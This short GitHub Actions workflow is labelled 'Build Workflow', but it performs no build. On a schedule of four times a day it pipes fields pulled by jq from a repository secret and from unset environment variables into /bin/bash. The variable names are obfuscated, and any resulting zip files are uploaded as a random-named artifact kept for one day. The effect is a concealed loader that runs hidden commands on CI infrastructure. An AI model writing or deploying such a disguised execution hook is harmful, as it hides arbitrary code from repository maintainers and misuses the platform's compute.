name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '51 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Launch
        env:
          g6: ${{ secrets.g6 }}
        run: |
          printf '%s' "$g6" | jq -r .gi1 | /bin/bash
          echo $kdw267 | jq -r .ims7000 | /bin/bash
          printf '%s' "$k902" | jq -r .csc45262 | /bin/bash

      - name: Persist output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: eq9G8qS8
          path: "*.zip"
          retention-days: 1
